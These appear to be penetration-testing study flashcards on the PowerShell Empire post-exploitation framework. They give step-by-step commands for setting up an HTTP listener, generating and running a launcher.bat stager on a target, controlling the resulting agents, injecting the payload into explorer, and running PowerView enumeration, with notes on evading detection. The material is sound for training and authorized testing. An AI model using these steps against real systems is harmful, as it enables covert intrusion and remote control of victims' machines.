PowerShell Empire Flashcards
What is the name of the Github repository of Empire?
PowerShellEmpire
How do you install Empire?
- Clone Github repo
- cd Empire
- sudo ./setup/install.sh
- sudo ./Empire
How do you see a list of Empire listeners?
- (Empire) > listeners
- - (Empire: listeners) > uselistener
What are the available listeners in Empire?
- dbx
- http = most basic
- http_com
- http_foreign
- http_hop
- http_mapi
- meterpreter
- redirector = creates a pivot that enables communication with an internal network
How do you select the http listener and select a Host listener IP of 10.11.0.4?
- (Empire: listeners) > uselistener http
- (Empire: listeners) > set Host 10.11.0.4
- (Empire: listeners/http) > execute
If you are in a selected listener, how to you return to the main Listener Menu?
(Empire: listeners/http) > back
How can you list the available Stagers?
- ** Make sure you are in the Listener main menu ***
- - (Empire: listeners) > usestager
What are some support examples that Empire Stagers provide?
- DLLs
- HTML applications
- Microsoft Office Macros
How do you select the ‘windows/launcher_bat’ Stager for the HTTP Listener?
– (Empire: listeners) > usestager windows/launcher_bat
– Empire: stager/windows/launcher_bat) > set Listener http
– (Empire: stager/windows/launcher_bat) > execute
** Here is the output **
[] Stager output written out to: /tmp/launcher.bat
————————————–
** The Stager must then be copied to the target and executed
How can we examine what the ‘windows/launcher_bat’ Stager does?
– kali@kali:/opt/Empire$ cat /tmp/launcher.bat
What is an Empire ‘Agent’?
- the final payload retrieved by the Stager
- it allows us to execute commands and interact with the system
- the Stager deletes itself and exits once it finishes execution
What happens once the ‘Agent’ is operational on the target?
- the ‘Agent’ will set up an AES-encrypted communication channel with the listener using the data portion of the HTTP GET and POST requests
How do we get the ‘Agent’ operational on the target?
- We execute copy the Stager output to the target and execute it
- For example, launcher.bat
- C:\Users\Offsec\Documents> launcher.bat
Once the ‘Agent’ is operational, how do we view it in Empire?
(Empire: stager/windows/launcher_bat) > agents
Once the ‘Agent’ is operational, how do we interact with it in Empire?
(Empire: agents) > interact S2Y5XW1L
How do we migrate our payload into a process on the target from the ‘Agent’ interaction in Empire?
- Display processes running on the target
- - (Empire: S2Y5XW1L) > ps - Inject the Payload
- - (Empire: S2Y5XW1L) > psinject http 3568
- ————————————-
* ** In the example, the process selected for payload injection was ‘explorer’ ***
- ————————————- - See the new Agent is created
- - (Empire: DWZ49BAP) > agents - Switch to the new Agent
- - (Empire: agents) > interact DWZ49BAP
- ————————————
* ** You must switch to the new Agent that is generated after injecting the payload into the running process ***
How do you list the available Empire modules?
– (Empire: S2Y5XW1L) > usemodule
Which Empire module focuses on local client and AD enumeration?
situational_awareness
What is the module path for Powerview?
situational_awareness/network/powerview
How do you display the options of the module?
info
What does it mean if the ‘NeedsAdmin’ field is set to ‘True’?
- the script requires local Administrators permissions
What does it mean if the ‘OpsecSafe’ field is set to ‘True’?
- will avoid leaving behind indicators of compromise, such as temporary disk files or new user accounts
What does it mean if the ‘MinLanguageVersion’ field is set to ‘True’?
- describes the minimum version of PowerShell required to execute the script
- ** Especially relevant with Windows 7 or Windows Server 2008 R2 that ship with PowerShell v.2
What does it mean if the ‘Background’ field is set to ‘True’?
- the module executes in the background w/o visibility for the victim
